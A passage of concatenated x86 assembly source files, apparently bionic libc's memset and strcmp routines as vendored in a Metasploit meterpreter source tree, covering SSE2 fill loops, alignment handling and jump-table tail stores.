	orl	%edx,%eax	/* eax now holds the byte pattern x4 */
	movl	%edi,%edx	/* compute misalignment */
	negl	%edx
	andl	$3,%edx		/* edx = bytes needed to reach 4-alignment */
	movl	%ecx,%ebx
	subl	%edx,%ebx	/* ebx = bytes left after the alignment fill */
	movl	%edx,%ecx	/* set until word aligned */
	rep
	stosb
	movl	%ebx,%ecx
	shrl	$2,%ecx		/* set by words */
	rep
	stosl
	movl	%ebx,%ecx	/* set remainder by bytes */
	andl	$3,%ecx
L1:	rep
	stosb
	popl	%eax		/* pop address of buffer */
	popl	%ebx
	popl	%edi
	ret
|
OpenWireSec/metasploit | 1,654 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcmp_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * Build-time dispatch for strcmp: when SSSE3 is enabled, pull in the
 * SSSE3 implementation with its entry point renamed to strcmp;
 * otherwise fall back to the generic strcmp.S.
 */
#if defined(USE_SSSE3)
# define ssse3_strcmp_latest strcmp
# include "ssse3-strcmp.S"
#else
# include "strcmp.S"
#endif
|
OpenWireSec/metasploit | 25,574 | external/source/meterpreter/source/bionic/libc/arch-x86/string/sse2-memset5-atom.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* Local-label helper: L(x) expands to the assembler-local name .Lx.  */
#ifndef L
# define L(label)	.L##label
#endif

/* Alignment helper: ALIGN(n) aligns to a 2^n byte boundary.  */
#ifndef ALIGN
# define ALIGN(n)	.p2align n
#endif

/* DWARF call-frame-information directives, overridable by the build.  */
#ifndef cfi_startproc
# define cfi_startproc	.cfi_startproc
#endif

#ifndef cfi_endproc
# define cfi_endproc	.cfi_endproc
#endif

#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off)	.cfi_rel_offset reg, off
#endif

#ifndef cfi_restore
# define cfi_restore(reg)	.cfi_restore (reg)
#endif

#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off)	.cfi_adjust_cfa_offset off
#endif

/* Function entry: declare type, export the symbol, align, and open
   the CFI region.  */
#ifndef ENTRY
# define ENTRY(name)	\
	.type name, @function;	\
	.globl name;	\
	.p2align 4;	\
name:	\
	cfi_startproc
#endif

/* Function exit: close the CFI region and record the symbol size.  */
#ifndef END
# define END(name)	\
	cfi_endproc;	\
	.size name, .-name
#endif

/* CFI bookkeeping for a 4-byte push/pop of a callee-saved register.  */
#define CFI_PUSH(REG)	\
	cfi_adjust_cfa_offset (4);	\
	cfi_rel_offset (REG, 0)

#define CFI_POP(REG)	\
	cfi_adjust_cfa_offset (-4);	\
	cfi_restore (REG)

/* push/pop paired with the matching CFI updates.  */
#define PUSH(REG)	pushl REG; CFI_PUSH (REG)
#define POP(REG)	popl REG; CFI_POP (REG)

/* Stack-argument offsets.  bzero(dst, len) has no fill-char argument
   and returns nothing, so SETRTNVAL is empty; memset(dst, c, len)
   returns dst in %eax.  */
#ifdef USE_AS_BZERO
# define DEST		PARMS
# define LEN		DEST+4
# define SETRTNVAL
#else
# define DEST		PARMS
# define CHR		DEST+4
# define LEN		CHR+4
# define SETRTNVAL	movl DEST(%esp), %eax
#endif

#ifdef SHARED
# define ENTRANCE	PUSH (%ebx);
# define RETURN_END	POP (%ebx); ret
# define RETURN		RETURN_END; CFI_PUSH (%ebx)
# define PARMS		8		/* Preserve EBX. */
# define JMPTBL(I, B)	I - B

/* Load an entry in a jump table into EBX and branch to it.  TABLE is a
   jump table with relative offsets.  */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE)	\
    /* We first load PC into EBX.  */	\
    call	__i686.get_pc_thunk.bx;	\
    /* Get the address of the jump table.  */	\
    add		$(TABLE - .), %ebx;	\
    /* Get the entry and convert the relative offset to the	\
       absolute address.  */	\
    add		(%ebx,%ecx,4), %ebx;	\
    add		%ecx, %edx;	\
    /* We loaded the jump table and adjusted EDX. Go.  */	\
    jmp		*%ebx

/* PIC helper: returns the caller's address in %ebx.  Placed in a
   linkonce section so duplicate copies across objects are merged.  */
	.section	.gnu.linkonce.t.__i686.get_pc_thunk.bx,"ax",@progbits
	.globl	__i686.get_pc_thunk.bx
	.hidden	__i686.get_pc_thunk.bx
	ALIGN (4)
	.type	__i686.get_pc_thunk.bx,@function
__i686.get_pc_thunk.bx:
	movl	(%esp), %ebx
	ret
#else
# define ENTRANCE
# define RETURN_END	ret
# define RETURN		RETURN_END
# define PARMS		4
# define JMPTBL(I, B)	I

/* Branch to an entry in a jump table.  TABLE is a jump table with
   absolute offsets.  */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE)	\
    add		%ecx, %edx;	\
    jmp		*TABLE(,%ecx,4)
#endif
.section .text.sse2,"ax",@progbits
ALIGN (4)
ENTRY (sse2_memset5_atom)
ENTRANCE
movl LEN(%esp), %ecx
#ifdef USE_AS_BZERO
xor %eax, %eax
#else
movzbl CHR(%esp), %eax
movb %al, %ah
/* Fill the whole EAX with pattern. */
movl %eax, %edx
shl $16, %eax
or %edx, %eax
#endif
movl DEST(%esp), %edx
cmp $32, %ecx
jae L(32bytesormore)
L(write_less32bytes):
BRANCH_TO_JMPTBL_ENTRY (L(table_less_32bytes))
.pushsection .rodata.sse2,"a",@progbits
ALIGN (2)
L(table_less_32bytes):
.int JMPTBL (L(write_0bytes), L(table_less_32bytes))
.int JMPTBL (L(write_1bytes), L(table_less_32bytes))
.int JMPTBL (L(write_2bytes), L(table_less_32bytes))
.int JMPTBL (L(write_3bytes), L(table_less_32bytes))
.int JMPTBL (L(write_4bytes), L(table_less_32bytes))
.int JMPTBL (L(write_5bytes), L(table_less_32bytes))
.int JMPTBL (L(write_6bytes), L(table_less_32bytes))
.int JMPTBL (L(write_7bytes), L(table_less_32bytes))
.int JMPTBL (L(write_8bytes), L(table_less_32bytes))
.int JMPTBL (L(write_9bytes), L(table_less_32bytes))
.int JMPTBL (L(write_10bytes), L(table_less_32bytes))
.int JMPTBL (L(write_11bytes), L(table_less_32bytes))
.int JMPTBL (L(write_12bytes), L(table_less_32bytes))
.int JMPTBL (L(write_13bytes), L(table_less_32bytes))
.int JMPTBL (L(write_14bytes), L(table_less_32bytes))
.int JMPTBL (L(write_15bytes), L(table_less_32bytes))
.int JMPTBL (L(write_16bytes), L(table_less_32bytes))
.int JMPTBL (L(write_17bytes), L(table_less_32bytes))
.int JMPTBL (L(write_18bytes), L(table_less_32bytes))
.int JMPTBL (L(write_19bytes), L(table_less_32bytes))
.int JMPTBL (L(write_20bytes), L(table_less_32bytes))
.int JMPTBL (L(write_21bytes), L(table_less_32bytes))
.int JMPTBL (L(write_22bytes), L(table_less_32bytes))
.int JMPTBL (L(write_23bytes), L(table_less_32bytes))
.int JMPTBL (L(write_24bytes), L(table_less_32bytes))
.int JMPTBL (L(write_25bytes), L(table_less_32bytes))
.int JMPTBL (L(write_26bytes), L(table_less_32bytes))
.int JMPTBL (L(write_27bytes), L(table_less_32bytes))
.int JMPTBL (L(write_28bytes), L(table_less_32bytes))
.int JMPTBL (L(write_29bytes), L(table_less_32bytes))
.int JMPTBL (L(write_30bytes), L(table_less_32bytes))
.int JMPTBL (L(write_31bytes), L(table_less_32bytes))
.popsection
ALIGN (4)
L(write_28bytes):
movl %eax, -28(%edx)
L(write_24bytes):
movl %eax, -24(%edx)
L(write_20bytes):
movl %eax, -20(%edx)
L(write_16bytes):
movl %eax, -16(%edx)
L(write_12bytes):
movl %eax, -12(%edx)
L(write_8bytes):
movl %eax, -8(%edx)
L(write_4bytes):
movl %eax, -4(%edx)
L(write_0bytes):
SETRTNVAL
RETURN
ALIGN (4)
L(write_29bytes):
movl %eax, -29(%edx)
L(write_25bytes):
movl %eax, -25(%edx)
L(write_21bytes):
movl %eax, -21(%edx)
L(write_17bytes):
movl %eax, -17(%edx)
L(write_13bytes):
movl %eax, -13(%edx)
L(write_9bytes):
movl %eax, -9(%edx)
L(write_5bytes):
movl %eax, -5(%edx)
L(write_1bytes):
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(write_30bytes):
movl %eax, -30(%edx)
L(write_26bytes):
movl %eax, -26(%edx)
L(write_22bytes):
movl %eax, -22(%edx)
L(write_18bytes):
movl %eax, -18(%edx)
L(write_14bytes):
movl %eax, -14(%edx)
L(write_10bytes):
movl %eax, -10(%edx)
L(write_6bytes):
movl %eax, -6(%edx)
L(write_2bytes):
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(write_31bytes):
movl %eax, -31(%edx)
L(write_27bytes):
movl %eax, -27(%edx)
L(write_23bytes):
movl %eax, -23(%edx)
L(write_19bytes):
movl %eax, -19(%edx)
L(write_15bytes):
movl %eax, -15(%edx)
L(write_11bytes):
movl %eax, -11(%edx)
L(write_7bytes):
movl %eax, -7(%edx)
L(write_3bytes):
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* ECX > 32 and EDX is 4 byte aligned. */
L(32bytesormore):
/* Fill xmm0 with the pattern. */
#ifdef USE_AS_BZERO
pxor %xmm0, %xmm0
#else
movd %eax, %xmm0
punpcklbw %xmm0, %xmm0
pshufd $0, %xmm0, %xmm0
#endif
testl $0xf, %edx
jz L(aligned_16)
/* ECX > 32 and EDX is not 16 byte aligned. */
L(not_aligned_16):
movdqu %xmm0, (%edx)
movl %edx, %eax
and $-16, %edx
add $16, %edx
sub %edx, %eax
add %eax, %ecx
movd %xmm0, %eax
ALIGN (4)
L(aligned_16):
cmp $128, %ecx
jae L(128bytesormore)
L(aligned_16_less128bytes):
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
ALIGN (4)
L(128bytesormore):
#ifdef SHARED_CACHE_SIZE
PUSH (%ebx)
mov $SHARED_CACHE_SIZE, %ebx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
mov __x86_shared_cache_size@GOTOFF(%ebx), %ebx
# else
PUSH (%ebx)
mov __x86_shared_cache_size, %ebx
# endif
#endif
cmp %ebx, %ecx
jae L(128bytesormore_nt_start)
#ifdef DATA_CACHE_SIZE
POP (%ebx)
cmp $DATA_CACHE_SIZE, %ecx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
cmp __x86_data_cache_size@GOTOFF(%ebx), %ecx
# else
POP (%ebx)
cmp __x86_data_cache_size, %ecx
# endif
#endif
jae L(128bytes_L2_normal)
subl $128, %ecx
L(128bytesormore_normal):
sub $128, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm0, 0x10(%edx)
movdqa %xmm0, 0x20(%edx)
movdqa %xmm0, 0x30(%edx)
movdqa %xmm0, 0x40(%edx)
movdqa %xmm0, 0x50(%edx)
movdqa %xmm0, 0x60(%edx)
movdqa %xmm0, 0x70(%edx)
lea 128(%edx), %edx
jb L(128bytesless_normal)
sub $128, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm0, 0x10(%edx)
movdqa %xmm0, 0x20(%edx)
movdqa %xmm0, 0x30(%edx)
movdqa %xmm0, 0x40(%edx)
movdqa %xmm0, 0x50(%edx)
movdqa %xmm0, 0x60(%edx)
movdqa %xmm0, 0x70(%edx)
lea 128(%edx), %edx
jae L(128bytesormore_normal)
L(128bytesless_normal):
lea 128(%ecx), %ecx
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
ALIGN (4)
L(128bytes_L2_normal):
prefetcht0 0x380(%edx)
prefetcht0 0x3c0(%edx)
sub $128, %ecx
movdqa %xmm0, (%edx)
movaps %xmm0, 0x10(%edx)
movaps %xmm0, 0x20(%edx)
movaps %xmm0, 0x30(%edx)
movaps %xmm0, 0x40(%edx)
movaps %xmm0, 0x50(%edx)
movaps %xmm0, 0x60(%edx)
movaps %xmm0, 0x70(%edx)
add $128, %edx
cmp $128, %ecx
jae L(128bytes_L2_normal)
L(128bytesless_L2_normal):
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
/*
 * Very large fills: split the set into a first portion written with
 * ordinary cached stores and a remainder written with non-temporal
 * stores (movntdq) to avoid evicting the cache.
 * NOTE(review): %ebx appears to hold the cached-portion size (a
 * cache-size-derived bound loaded before this point, outside this
 * view) -- confirm against the function prologue.  It is popped at
 * L(shared_cache_loop_end) under the same #if as its push.
 */
L(128bytesormore_nt_start):
sub %ebx, %ecx /* %ecx = bytes left for the non-temporal phase */
ALIGN (4)
/* Phase 1: cached stores for the first %ebx bytes, with prefetch. */
L(128bytesormore_shared_cache_loop):
prefetcht0 0x3c0(%edx)
prefetcht0 0x380(%edx)
sub $0x80, %ebx
movdqa %xmm0, (%edx)
movdqa %xmm0, 0x10(%edx)
movdqa %xmm0, 0x20(%edx)
movdqa %xmm0, 0x30(%edx)
movdqa %xmm0, 0x40(%edx)
movdqa %xmm0, 0x50(%edx)
movdqa %xmm0, 0x60(%edx)
movdqa %xmm0, 0x70(%edx)
add $0x80, %edx
cmp $0x80, %ebx
jae L(128bytesormore_shared_cache_loop)
cmp $0x80, %ecx
jb L(shared_cache_loop_end)
ALIGN (4)
/* Phase 2: non-temporal 128-byte stores for the remainder. */
L(128bytesormore_nt):
sub $0x80, %ecx
movntdq %xmm0, (%edx)
movntdq %xmm0, 0x10(%edx)
movntdq %xmm0, 0x20(%edx)
movntdq %xmm0, 0x30(%edx)
movntdq %xmm0, 0x40(%edx)
movntdq %xmm0, 0x50(%edx)
movntdq %xmm0, 0x60(%edx)
movntdq %xmm0, 0x70(%edx)
add $0x80, %edx
cmp $0x80, %ecx
jae L(128bytesormore_nt)
sfence /* order the weakly-ordered movntdq stores before returning */
L(shared_cache_loop_end):
#if defined DATA_CACHE_SIZE || !defined SHARED
POP (%ebx)
#endif
/* Tail (0..127 bytes) via the jump table. */
BRANCH_TO_JMPTBL_ENTRY (L(table_16_128bytes))
/*
 * 128-entry jump table: entry N dispatches to L(aligned_16_Nbytes),
 * which stores the final N bytes ending at %edx.  JMPTBL emits
 * table-relative offsets under SHARED (PIC) and absolute addresses
 * otherwise; BRANCH_TO_JMPTBL_ENTRY performs the matching indirect
 * jump.  Placed in .rodata so the table is not in the text stream.
 */
.pushsection .rodata.sse2,"a",@progbits
ALIGN (2)
L(table_16_128bytes):
.int JMPTBL (L(aligned_16_0bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_1bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_2bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_3bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_4bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_5bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_6bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_7bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_8bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_9bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_10bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_11bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_12bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_13bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_14bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_15bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_16bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_17bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_18bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_19bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_20bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_21bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_22bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_23bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_24bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_25bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_26bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_27bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_28bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_29bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_30bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_31bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_32bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_33bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_34bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_35bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_36bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_37bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_38bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_39bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_40bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_41bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_42bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_43bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_44bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_45bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_46bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_47bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_48bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_49bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_50bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_51bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_52bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_53bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_54bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_55bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_56bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_57bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_58bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_59bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_60bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_61bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_62bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_63bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_64bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_65bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_66bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_67bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_68bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_69bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_70bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_71bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_72bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_73bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_74bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_75bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_76bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_77bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_78bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_79bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_80bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_81bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_82bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_83bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_84bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_85bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_86bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_87bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_88bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_89bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_90bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_91bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_92bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_93bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_94bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_95bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_96bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_97bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_98bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_99bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_100bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_101bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_102bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_103bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_104bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_105bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_106bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_107bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_108bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_109bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_110bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_111bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_112bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_113bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_114bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_115bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_116bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_117bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_118bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_119bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_120bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_121bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_122bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_123bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_124bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_125bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_126bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_127bytes), L(table_16_128bytes))
.popsection
/*
 * Tail handlers: L(aligned_16_Nbytes) stores the final N (0..127)
 * bytes ending at %edx, which is past-the-end here.  Handlers are
 * grouped by N mod 16: within a group the movdqa entries peel one
 * aligned 16-byte store each and fall through, ending in the scalar
 * stores for the sub-16 remainder.  %xmm0 holds the replicated fill
 * byte; %eax/%ax/%al hold its scalar copies (set up before this
 * point, outside this view).  SETRTNVAL and RETURN are macros
 * defined elsewhere in this file (return-value and epilogue details
 * differ between the memset and bzero builds).
 */
ALIGN (4)
/* Group N mod 16 == 0: pure 16-byte stores, no scalar tail. */
L(aligned_16_112bytes):
movdqa %xmm0, -112(%edx)
L(aligned_16_96bytes):
movdqa %xmm0, -96(%edx)
L(aligned_16_80bytes):
movdqa %xmm0, -80(%edx)
L(aligned_16_64bytes):
movdqa %xmm0, -64(%edx)
L(aligned_16_48bytes):
movdqa %xmm0, -48(%edx)
L(aligned_16_32bytes):
movdqa %xmm0, -32(%edx)
L(aligned_16_16bytes):
movdqa %xmm0, -16(%edx)
L(aligned_16_0bytes):
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 1: final byte via %al. */
L(aligned_16_113bytes):
movdqa %xmm0, -113(%edx)
L(aligned_16_97bytes):
movdqa %xmm0, -97(%edx)
L(aligned_16_81bytes):
movdqa %xmm0, -81(%edx)
L(aligned_16_65bytes):
movdqa %xmm0, -65(%edx)
L(aligned_16_49bytes):
movdqa %xmm0, -49(%edx)
L(aligned_16_33bytes):
movdqa %xmm0, -33(%edx)
L(aligned_16_17bytes):
movdqa %xmm0, -17(%edx)
L(aligned_16_1bytes):
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 2: final word via %ax. */
L(aligned_16_114bytes):
movdqa %xmm0, -114(%edx)
L(aligned_16_98bytes):
movdqa %xmm0, -98(%edx)
L(aligned_16_82bytes):
movdqa %xmm0, -82(%edx)
L(aligned_16_66bytes):
movdqa %xmm0, -66(%edx)
L(aligned_16_50bytes):
movdqa %xmm0, -50(%edx)
L(aligned_16_34bytes):
movdqa %xmm0, -34(%edx)
L(aligned_16_18bytes):
movdqa %xmm0, -18(%edx)
L(aligned_16_2bytes):
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 3: overlapping word + byte stores. */
L(aligned_16_115bytes):
movdqa %xmm0, -115(%edx)
L(aligned_16_99bytes):
movdqa %xmm0, -99(%edx)
L(aligned_16_83bytes):
movdqa %xmm0, -83(%edx)
L(aligned_16_67bytes):
movdqa %xmm0, -67(%edx)
L(aligned_16_51bytes):
movdqa %xmm0, -51(%edx)
L(aligned_16_35bytes):
movdqa %xmm0, -35(%edx)
L(aligned_16_19bytes):
movdqa %xmm0, -19(%edx)
L(aligned_16_3bytes):
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 4: final dword via %eax. */
L(aligned_16_116bytes):
movdqa %xmm0, -116(%edx)
L(aligned_16_100bytes):
movdqa %xmm0, -100(%edx)
L(aligned_16_84bytes):
movdqa %xmm0, -84(%edx)
L(aligned_16_68bytes):
movdqa %xmm0, -68(%edx)
L(aligned_16_52bytes):
movdqa %xmm0, -52(%edx)
L(aligned_16_36bytes):
movdqa %xmm0, -36(%edx)
L(aligned_16_20bytes):
movdqa %xmm0, -20(%edx)
L(aligned_16_4bytes):
movl %eax, -4(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 5: dword + byte. */
L(aligned_16_117bytes):
movdqa %xmm0, -117(%edx)
L(aligned_16_101bytes):
movdqa %xmm0, -101(%edx)
L(aligned_16_85bytes):
movdqa %xmm0, -85(%edx)
L(aligned_16_69bytes):
movdqa %xmm0, -69(%edx)
L(aligned_16_53bytes):
movdqa %xmm0, -53(%edx)
L(aligned_16_37bytes):
movdqa %xmm0, -37(%edx)
L(aligned_16_21bytes):
movdqa %xmm0, -21(%edx)
L(aligned_16_5bytes):
